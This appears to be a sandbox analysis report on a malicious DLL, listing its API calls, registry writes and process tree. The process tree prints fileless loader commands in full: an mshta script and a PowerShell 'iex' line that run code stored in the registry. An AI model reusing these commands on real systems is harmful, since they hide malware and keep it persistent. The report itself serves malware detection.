Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E23192C NtMapViewOfSection, 0_2_6E23192C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E231E74 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_6E231E74
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E2312CE GetProcAddress,NtCreateSection,memset, 0_2_6E2312CE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E232495 NtQueryVirtualMemory, 0_2_6E232495
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04843C5B NtCreateSection,memset, 0_2_04843C5B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048625B9 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 0_2_048625B9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04854D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_04854D10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485A680 NtMapViewOfSection, 0_2_0485A680
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04844F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_04844F72
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048468EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_048468EE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048551A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_048551A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485790F NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0485790F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04860A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_04860A00
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04856A33 NtQueryInformationProcess, 0_2_04856A33
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048633A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_048633A6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484CBA7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0484CBA7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_0484349A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485AD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0485AD9A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485E543 NtGetContextThread,RtlNtStatusToDosError, 0_2_0485E543
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048509C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_048509C7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04848936 memset,NtQueryInformationProcess, 0_2_04848936
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484C240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_0484C240
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048603BD NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_048603BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0486133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_0486133A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D4D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_053D4D10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C4F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 3_2_053C4F72
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D51A4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_053D51A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C68EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_053C68EE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E33A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_053E33A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D6A33 NtQueryInformationProcess, 3_2_053D6A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E0A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 3_2_053E0A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053DE543 NtGetContextThread,RtlNtStatusToDosError, 3_2_053DE543
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053DAD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053DAD9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_053C349A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C8936 memset,NtQueryInformationProcess, 3_2_053C8936
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D790F NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053D790F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D09C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_053D09C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 3_2_053E133A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E03BD NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_053E03BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CCBA7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_053CCBA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CC240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 3_2_053CC240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F25E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_063F25E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F8055 NtQueryVirtualMemory, 5_2_063F8055
Source: C:\Windows\System32\control.exe Code function: 42_2_00F179DC NtQueryInformationToken,NtQueryInformationToken,NtClose, 42_2_00F179DC
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFC29C NtQueryInformationProcess, 42_2_00EFC29C
Source: C:\Windows\System32\control.exe Code function: 42_2_00F066D4 NtSetInformationProcess,CreateRemoteThread, 42_2_00F066D4
Source: C:\Windows\System32\control.exe Code function: 42_2_00F2F002 NtProtectVirtualMemory,NtProtectVirtualMemory, 42_2_00F2F002
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485A606 CreateProcessAsUserA, 0_2_0485A606
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E232274 0_2_6E232274
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485F4BE 0_2_0485F4BE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04861CD6 0_2_04861CD6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485ED58 0_2_0485ED58
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485DE9A 0_2_0485DE9A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04850F82 0_2_04850F82
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04842F9C 0_2_04842F9C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048498A0 0_2_048498A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484D8E5 0_2_0484D8E5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484B2A4 0_2_0484B2A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_048652A0 0_2_048652A0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484EAFA 0_2_0484EAFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053DED58 3_2_053DED58
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053DF4BE 3_2_053DF4BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E1CD6 3_2_053E1CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C2F9C 3_2_053C2F9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D0F82 3_2_053D0F82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053DDE9A 3_2_053DDE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053C98A0 3_2_053C98A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CD8E5 3_2_053CD8E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CB2A4 3_2_053CB2A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E52A0 3_2_053E52A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CEAFA 3_2_053CEAFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F7E30 5_2_063F7E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F6680 5_2_063F6680
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_063F175B 5_2_063F175B
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0D958 42_2_00F0D958
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1832C 42_2_00F1832C
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF30FC 42_2_00EF30FC
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF90FC 42_2_00EF90FC
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFA8C4 42_2_00EFA8C4
Source: C:\Windows\System32\control.exe Code function: 42_2_00F058DC 42_2_00F058DC
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF5080 42_2_00EF5080
Source: C:\Windows\System32\control.exe Code function: 42_2_00F13858 42_2_00F13858
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF5814 42_2_00EF5814
Source: C:\Windows\System32\control.exe Code function: 42_2_00F069AC 42_2_00F069AC
Source: C:\Windows\System32\control.exe Code function: 42_2_00F15110 42_2_00F15110
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1CAF4 42_2_00F1CAF4
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1A280 42_2_00F1A280
Source: C:\Windows\System32\control.exe Code function: 42_2_00F16268 42_2_00F16268
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF624C 42_2_00EF624C
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0625C 42_2_00F0625C
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF8254 42_2_00EF8254
Source: C:\Windows\System32\control.exe Code function: 42_2_00F16A38 42_2_00F16A38
Source: C:\Windows\System32\control.exe Code function: 42_2_00F05210 42_2_00F05210
Source: C:\Windows\System32\control.exe Code function: 42_2_00F03BE0 42_2_00F03BE0
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFC3B4 42_2_00EFC3B4
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFBB94 42_2_00EFBB94
Source: C:\Windows\System32\control.exe Code function: 42_2_00F13B8E 42_2_00F13B8E
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1BB54 42_2_00F1BB54
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF3B24 42_2_00EF3B24
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF9CD0 42_2_00EF9CD0
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1A470 42_2_00F1A470
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF1C78 42_2_00EF1C78
Source: C:\Windows\System32\control.exe Code function: 42_2_00F05C24 42_2_00F05C24
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF25E8 42_2_00EF25E8
Source: C:\Windows\System32\control.exe Code function: 42_2_00F075F8 42_2_00F075F8
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0F598 42_2_00F0F598
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFED6C 42_2_00EFED6C
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0CD6C 42_2_00F0CD6C
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF7D48 42_2_00EF7D48
Source: C:\Windows\System32\control.exe Code function: 42_2_00F10D44 42_2_00F10D44
Source: C:\Windows\System32\control.exe Code function: 42_2_00F17524 42_2_00F17524
Source: C:\Windows\System32\control.exe Code function: 42_2_00F00EF4 42_2_00F00EF4
Source: C:\Windows\System32\control.exe Code function: 42_2_00EFFEE4 42_2_00EFFEE4
Source: C:\Windows\System32\control.exe Code function: 42_2_00F1A6C8 42_2_00F1A6C8
Source: C:\Windows\System32\control.exe Code function: 42_2_00F16E34 42_2_00F16E34
Source: C:\Windows\System32\control.exe Code function: 42_2_00F15E3C 42_2_00F15E3C
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0EF74 42_2_00F0EF74
Source: C:\Windows\System32\control.exe Code function: 42_2_00F07F68 42_2_00F07F68
Source: C:\Windows\System32\control.exe Code function: 42_2_00EF4744 42_2_00EF4744
Source: C:\Windows\System32\control.exe Code function: 42_2_00F0AF34 42_2_00F0AF34
PE file does not import any functions
Source: tangn2aw.dll.27.dr Static PE information: No import functions for PE file found
Source: 4mppu3lx.dll.34.dr Static PE information: No import functions for PE file found
Source: kdz1kgtq.dll.23.dr Static PE information: No import functions for PE file found
Source: y3j0hr41.dll.39.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: beneficial.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: classification engine Classification label: mal100.troj.evad.winDLL@42/36@9/1
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485D325 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 0_2_0485D325
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210730
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{7E32BD42-C5B7-60C6-3F92-C994E3E60D08}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{E235F4DB-D9BB-64F3-7336-1DD857CAA18C}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{92A77881-C9A1-9440-E3E6-0D08C77A91BC}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{8E094731-9503-F07F-8FA2-992433F6DD98}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5488:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{92CEAACD-C99C-94FF-E3E6-0D08C77A91BC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5usb1drh.jow.ps1
Source: beneficial.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Born
Source: beneficial.dll Virustotal: Detection: 7%
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\beneficial.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\beneficial.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Born
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\beneficial.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Fitsecond
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\beneficial.dll,Pastput
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bn9l='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn9l).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7CE2.tmp' 'c:\Users\user\AppData\Local\Temp\kdz1kgtq\CSC3C6C006953954AC2BBB3EA5383F4311.TMP'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>J7aj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(J7aj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES92FA.tmp' 'c:\Users\user\AppData\Local\Temp\tangn2aw\CSCCFAE70CB50C649DC9230F2DAC50A036.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB25A.tmp' 'c:\Users\user\AppData\Local\Temp\4mppu3lx\CSC5D5E602DFAC54795936F9835A1D78A6E.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.cmdline'
